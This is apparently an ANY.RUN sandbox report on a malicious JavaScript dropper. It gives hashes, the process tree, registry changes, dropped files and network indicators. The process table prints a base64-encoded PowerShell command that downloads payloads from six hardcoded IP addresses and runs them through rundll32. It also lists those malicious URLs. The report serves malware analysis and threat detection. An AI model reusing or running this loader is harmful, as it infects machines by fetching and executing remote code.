File name: | DETAILSE[XmL098].js |
Full analysis: | https://app.any.run/tasks/7f85e04c-cc26-49f7-a013-da8d2da23f66 |
Verdict: | Malicious activity |
Analysis date: | March 31, 2023, 22:35:21 |
OS: | Windows 10 Professional (build: 19044, 64 bit) |
Indicators: | |
MIME: | text/plain |
File info: | ASCII text, with very long lines, with CRLF line terminators |
MD5: | AEFA4EF9E799DBE4EA202393C08FBA85 |
SHA1: | D6A0909B03A6E2E6D8D7FBE45341D3AD318FD878 |
SHA256: | 649B30A8DECA5C0AA4DC68161E4D7C75B8BCBF47709C447BC49F932C8FF293CF |
SSDEEP: | 1536:FevaBD/8NRPIzPMc7XPNQ5yA+wWsARvABaxz/R7sPUCSCKJ7dOE3nM3Vr3rnP5eX:FevaBD/8NRPIzPMc7XPNQ5yA+wWsARv1 |
PID | CMD | Path | Indicators | Parent process | |||||||||||
---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
4636 | "C:\Windows\System32\WScript.exe" "C:\Users\admin\Downloads\DETAILSE[XmL098].js" | C:\Windows\System32\wscript.exe | — | explorer.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft ® Windows Based Script Host Exit code: 0 Version: 5.812.10240.16384 Modules
| |||||||||||||||
5292 | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -encodedcommand "UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAANQA7ACQARwBpAG4AZwBsAGUAcwAgAD0AIAAoACIAaAB0AHQAcAA6AC8ALwAyADEANgAuADEANAA2AC4AMgA1AC4AMQAyADkALwBSAFgAYwA1AGMAeQBQAC4AZABhAHQALABoAHQAdABwADoALwAvADEANAAxAC4AOQA0AC4AOAA2AC4AOQAwAC8AQwBnAGIAWQA3AEwAQgBNAG8AdwA2AC4AZABhAHQALABoAHQAdABwADoALwAvADkANAAuADEAMwAxAC4AMQAxADcALgAxADEAMQAvAEgANAAwAFcAegAxAEsAOAAuAGQAYQB0ACwAaAB0AHQAcAA6AC8ALwA4ADUALgAyADMAOQAuADQAMQAuADIAMAA1AC8AQQA0AHIAdQBzAHcAQQBTAHUAQgB5AC4AZABhAHQALABoAHQAdABwADoALwAvADEAOQA5AC4AMgA0ADcALgAzADAALgAyADAAMwAvAEEAZwBnAHQATQBHAFgAUAB5AC4AZABhAHQALABoAHQAdABwADoALwAvADEAMAA0AC4AMgAyADUALgAxADIAOQAuADEAMQA0AC8AVwBtAHQAUwBIADAAbwB0AGoARQA5AC4AZABhAHQAIgApAC4AcwBwAGwAaQB0ACgAIgAsACIAKQA7AGYAbwByAGUAYQBjAGgAIAAoACQAZgBlAHIAcgB1AGwAZQBzACAAaQBuACAAJABHAGkAbgBnAGwAZQBzACkAIAB7AHQAcgB5ACAAewB3AGcAZQB0ACAAJABmAGUAcgByAHUAbABlAHMAIAAtAFQAaQBtAGUAbwB1AHQAUwBlAGMAIAAxADUAIAAtAE8AIAAkAGUAbgB2ADoAVABFAE0AUABcAEEAZABpAGEAcABoAG8AcgBvAHUAcwAuAEcAaQBhAHIAZABpAGEAOwBpAGYAIAAoACgARwBlAHQALQBJAHQAZQBtACAAJABlAG4AdgA6AFQARQBNAFAAXABBAGQAaQBhAHAAaABvAHIAbwB1AHMALgBHAGkAYQByAGQAaQBhACkALgBsAGUAbgBnAHQAaAAgAC0AZwBlACAAMQAwADAAMAAwADAAKQAgAHsAcwB0AGEAcgB0ACAAcgB1AG4AZABsAGwAMwAyACAAJABlAG4AdgA6AFQARQBNAFAAXABcAEEAZABpAGEAcABoAG8AcgBvAHUAcwAuAEcAaQBhAHIAZABpAGEALABYADUANQA1ADsAYgByAGUAYQBrADsAfQB9AGMAYQB0AGMAaAAgAHsAUwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAANQA7AH0AfQA=" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | wscript.exe | ||||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
5688 | \??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1 | C:\Windows\System32\conhost.exe | — | powershell.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Console Window Host Exit code: 0 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
5780 | C:\WINDOWS\System32\slui.exe -Embedding | C:\Windows\System32\slui.exe | — | svchost.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Activation Client Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
|
(PID) Process: | (4636) wscript.exe | Key: | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
Operation: | write | Name: | ProxyBypass |
Value: 1 | |||
(PID) Process: | (4636) wscript.exe | Key: | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
Operation: | write | Name: | IntranetName |
Value: 1 | |||
(PID) Process: | (4636) wscript.exe | Key: | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
Operation: | write | Name: | UNCAsIntranet |
Value: 1 | |||
(PID) Process: | (4636) wscript.exe | Key: | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
Operation: | write | Name: | AutoDetect |
Value: 0 | |||
(PID) Process: | (5292) powershell.exe | Key: | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
Operation: | write | Name: | ProxyBypass |
Value: 1 | |||
(PID) Process: | (5292) powershell.exe | Key: | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
Operation: | write | Name: | IntranetName |
Value: 1 | |||
(PID) Process: | (5292) powershell.exe | Key: | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
Operation: | write | Name: | UNCAsIntranet |
Value: 1 | |||
(PID) Process: | (5292) powershell.exe | Key: | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
Operation: | write | Name: | AutoDetect |
Value: 0 |
PID | Process | Filename | Type | |
---|---|---|---|---|
5292 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_f4kbo3jm.lmj.psm1 | text | |
MD5:D17FE0A3F47BE24A6453E9EF58C94641 | SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 | |||
5292 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_lqb5dz0i.kk3.ps1 | text | |
MD5:D17FE0A3F47BE24A6453E9EF58C94641 | SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 | |||
5292 | powershell.exe | C:\Users\admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log | text | |
MD5:1ACADA3C580D8D7AB5D8C84B136C78F1 | SHA256:1D4C4668DC6191C5C0B132D76740E086EC867304A736C82CA26AC5B026295207 | |||
5292 | powershell.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | binary | |
MD5:203DB5CE127AD004329D286F63C10AE2 | SHA256:099572E1F7DCF7DD9BF46855799F33941B2213C63E010EF0FC62699832BC9FA4 |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
5292 | powershell.exe | GET | 404 | 141.94.86.90:80 | http://141.94.86.90/CgbY7LBMow6.dat | FR | xml | 341 b | malicious |
5292 | powershell.exe | GET | 404 | 199.247.30.203:80 | http://199.247.30.203/AggtMGXPy.dat | NL | xml | 341 b | malicious |
5292 | powershell.exe | GET | 404 | 104.225.129.114:80 | http://104.225.129.114/WmtSH0otjE9.dat | US | xml | 341 b | malicious |
5292 | powershell.exe | GET | 404 | 85.239.41.205:80 | http://85.239.41.205/A4ruswASuBy.dat | CY | xml | 341 b | malicious |
5292 | powershell.exe | GET | 404 | 216.146.25.129:80 | http://216.146.25.129/RXc5cyP.dat | US | xml | 341 b | malicious |
5292 | powershell.exe | GET | 404 | 94.131.117.111:80 | http://94.131.117.111/H40Wz1K8.dat | US | xml | 341 b | malicious |
3128 | slui.exe | POST | 404 | 52.161.91.37:443 | https://activation-v2.sls.microsoft.com/SLActivateProduct/SLActivateProduct.asmx?configextension=Retail | US | xml | 341 b | whitelisted |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
5292 | powershell.exe | 94.131.117.111:80 | — | ZAYO-6461 | US | malicious |
5292 | powershell.exe | 141.94.86.90:80 | — | OVH SAS | FR | malicious |
5292 | powershell.exe | 199.247.30.203:80 | — | AS-CHOOPA | NL | malicious |
5292 | powershell.exe | 216.146.25.129:80 | — | CLOUDIE-NETWORKS-LLC | US | malicious |
5292 | powershell.exe | 104.225.129.114:80 | — | SHOCK-1 | US | malicious |
5292 | powershell.exe | 85.239.41.205:80 | — | Cloudlayer8 Limited | CY | malicious |
5952 | MoUsoCoreWorker.exe | 20.73.194.208:443 | — | MICROSOFT-CORP-MSN-AS-BLOCK | NL | whitelisted |
4716 | svchost.exe | 51.104.136.2:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | IE | whitelisted |
— | — | 52.161.91.37:443 | activation-v2.sls.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | US | suspicious |
5680 | svchost.exe | 20.73.194.208:443 | — | MICROSOFT-CORP-MSN-AS-BLOCK | NL | whitelisted |
Domain | IP | Reputation |
---|---|---|
settings-win.data.microsoft.com |
| whitelisted |
activation-v2.sls.microsoft.com |
| whitelisted |
self.events.data.microsoft.com |
| whitelisted |
PID | Process | Class | Message |
---|---|---|---|
5292 | powershell.exe | Not Suspicious Traffic | ET INFO Windows Powershell User-Agent Usage |
5292 | powershell.exe | Not Suspicious Traffic | ET INFO Windows Powershell User-Agent Usage |
5292 | powershell.exe | Not Suspicious Traffic | ET INFO Windows Powershell User-Agent Usage |
5292 | powershell.exe | Not Suspicious Traffic | ET INFO Windows Powershell User-Agent Usage |
5292 | powershell.exe | Not Suspicious Traffic | ET INFO Windows Powershell User-Agent Usage |
5292 | powershell.exe | Not Suspicious Traffic | ET INFO Windows Powershell User-Agent Usage |